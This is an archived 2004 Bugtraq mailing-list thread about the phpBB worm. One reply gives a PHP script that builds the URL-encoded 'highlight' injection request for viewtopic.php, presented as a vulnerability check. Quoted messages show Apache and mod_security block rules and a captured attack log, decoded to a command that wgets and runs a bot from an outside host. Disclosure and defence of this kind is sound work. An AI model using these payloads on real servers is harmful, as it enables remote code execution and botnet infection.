lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Wed, 22 Dec 2004 23:34:12 -0000 From: "William Geoghegan" <w.geoghegan@...tekcs.co.uk> To: "Sebastian Wiesinger" <bofh@...e-world.de>, <bugtraq@...urityfocus.com> Subject: Re: phpBB Worm A script to check if your phpBB is vulnerable. Anything below 2.0.11 _probably_ is but incase your not sure, use this script. The script generates the request parameters, all you need to do is copy the result onto www.thesite.com/viewtopic.php <? $rush='ls -al'; //do what $highlight='passthru($HTTP_GET_VARS[rush])'; // dont touch print "?t=%37&rush="; for ($i=0; $i<strlen($rush); ++$i) { print '%' . bin2hex(substr($rush,$i,1)); } print "&highlight=%2527."; for ($i=0; $i<strlen($highlight); ++$i) { prt '%' . bin2hex(substr($highlight,$i,1)); } print ".%2527"; ?> Cheers. William Geoghegan GEOTEK Computer Services - www.geotekcs.co.uk - ----- Original Message ----- From: "Sebastian Wiesinger" <bofh@...e-world.de> To: <bugtraq@...urityfocus.com> Sent: Wednesday, December 22, 2004 11:22 AM Subject: Re: phpBB Worm >* Raymond Dijkxhoorn <raymond@...location.net> [2004-12-22 00:06]: >> If you cannot fix it (virtual servers) fast for all your clients you >> could >> also try with something like this: >> >> RewriteEngine On >> RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR] >> RewriteCond %{QUERY_STRING} ^(.*)esystem(.*) >> RewriteRule ^.*$ - >> [F] >> >> We had some vhosts where this worked just fine. On our systems we didnt >> see any valid request with echr and esystem, just be gentle with it, it >> works for me, it could work for you ;) > > If you use mod_security, this may help, too: > > SecFilterSelective "THE_REQUEST" > "(system|exec|passthru|popen|shell_exec|proc_open|fopen|fwrite)\s*\(" > > I had another exploit attempt, with this payload: > > 66.119.13.4 - - [22/Dec/2004:10:06:47 +0100] "GET > /forum/viewtopic.php?t=%37&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%31%32%38%2E%31%37%34%2E%31%33%37%2E%32%33%30%2F%62%6E%20%2D%4F%20%2E%62%3B%20%70%65%72%6C%20%2D%70%65%20%79%2F%74%68%6D%76%64%77%30%39%38%37%36%35%34%33%32%31%75%6F%69%65%61%2F%61%65%69%6F%75%31%32%33%34%35%36%37%38%39%30%77%64%76%74%68%6D%2F%20%2E%62%7C%20%70%65%72%6C%3B%20%72%6D%20%2D%66%20%2E%62%20%2A%2E%70%6C%20%62%30%74%2A%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 > HTTP/1.1" 200 12266 "-" "-" > > Which decodes to: > > rush=echo _START_; cd /tmp;wget 128.174.137.230/bn -O .b; perl -pe > y/thmvdw0987654321uoiea/aeiou1234567890wdvthm/ .b| perl; rm -f .b *.pl > b0t*; echo _END_ > highlight='.passthru($HTTP_GET_VARS[rush]).' > > Regards, > > Sebastian > > -- > GPG Key-ID: 0x76B79F20 (0x1B6034F476B79F20) > Wehret den Anfaengen: http://odem.org/informationsfreiheit/ > Thunder rolled. ... It rolled a six. > --Terry Pratchett, Guards! Guards! > > > -- > No virus found in this incoming message. > Checked by AVG Anti-Virus. > Version: 7.0.298 / Virus Database: 265.6.4 - Release Date: 22/12/2004 > >
Powered by blists - more mailing lists